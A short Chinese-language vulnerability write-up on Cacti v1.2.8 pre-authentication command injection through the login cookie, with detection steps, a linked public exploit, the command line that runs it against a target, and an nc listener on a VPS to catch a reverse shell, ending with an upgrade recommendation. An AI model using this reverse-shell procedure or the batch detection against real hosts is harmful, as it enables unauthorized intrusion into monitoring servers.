0x00 简介
Cacti是一套基于PHP,MySQL,SNMP及RRDTool开发的网络流量监测图形分析工具。
可以看到中国有2714个站点都使用了这个工具。覆盖面还是比较广。
0x01 影响范围
受影响Cacti版本:Cacti v1.2.8
0x02 检测
1、先判断是否存在路径:/graph_realtime.php?action=init ,能正常回显说明存在。
2、再判断回显页面文本中是否存在“poller_realtime.php”字样,存在则存在漏洞。
也能访问到poller_realtime.php
可用脚本批量检测。
0x03 存在点
漏洞存在点为登录处的cookie处,变量Cacti的值,可将Cacti的值更改为系统命令,直接造成命令执行。
0x04 利用
exp下载:https://github.com/mhaskar/CVE-2020-8813
可用里面的第二个脚本:
python Cacti-preauth-rce.py http://xx.xx.xx.xx/cacti vps-host 1337
然后先在vps上开启nc监听端口1337,即可接收到反弹shell。
0x05 防范
更新Cacti版本至最新版 v1.2.9